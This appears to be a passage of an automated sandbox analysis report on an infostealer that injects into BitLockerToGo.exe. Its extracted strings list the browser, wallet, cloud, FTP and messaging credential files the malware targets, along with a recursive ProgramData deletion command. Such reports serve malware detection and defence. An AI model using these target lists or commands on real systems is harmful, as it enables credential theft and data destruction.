Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntmarta.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: propsys.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: apphelp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntshrui.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cscapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: linkinfo.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: edputil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: appresolver.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: slc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sppc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: pcacli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mpr.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: N11R7lRasm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: N11R7lRasm.exeStatic file information: File size 6520816 > 1048576
                  Source: N11R7lRasm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2eea00
                  Source: N11R7lRasm.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2c8800
                  Source: N11R7lRasm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ 
Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: BitLockerToGo.pdbGCTL source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040E886
                  Source: N11R7lRasm.exe | Static PE information: section name: .symtab
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\ProgramData\t0r90\f379r9
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\ProgramData\t0r90\f379r9
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\ProgramData\t0r90\f379r9

                  Boot Survival

                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040E886
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Dropped PE file which has not been started: C:\ProgramData\t0r90\f379r9
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_3-11565
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 4008 | Thread sleep count: 65 > 30
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,3_2_00407891
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,3_2_0040A69C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00408776
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,3_2_00413B10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,3_2_004013DA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00406784
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,3_2_00411187
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00412A5D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_00409C78
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00408224
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00412539
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00411BD2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00411722
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040DF8C GetSystemInfo,wsprintfA,3_2_0040DF8C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: Web Data.12.dr | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: discord.comVMware20,11696494690f
                  Source: Web Data.12.dr | Binary or memory string: AMC password management pageVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: Web Data.12.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Web Data.12.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: Web Data.12.dr | Binary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C30000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: msedge.exe, 0000000B.00000003.2097036344.00001FB40038C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware20,1(
                  Source: Web Data.12.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: Web Data.12.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: Web Data.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Web Data.12.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: N11R7lRasm.exe, 00000000.00000002.1852003531.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2157264139.0000027C20243000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: Web Data.12.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Web Data.12.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Web Data.12.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: dev.azure.comVMware20,11696494690j
                  Source: Web Data.12.dr | Binary or memory string: global block list test formVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Web Data.12.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: Web Data.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Web Data.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: Web Data.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: Web Data.12.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: Web Data.12.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node graph_3-12164
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node graph_3-12258
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node graph_3-11870
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040E886
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040DC15 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,3_2_0040DC15

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,3_2_0040F029
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_0040F0CA
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 883008
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000
                  Source: C:\Users\user\Desktop\N11R7lRasm.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
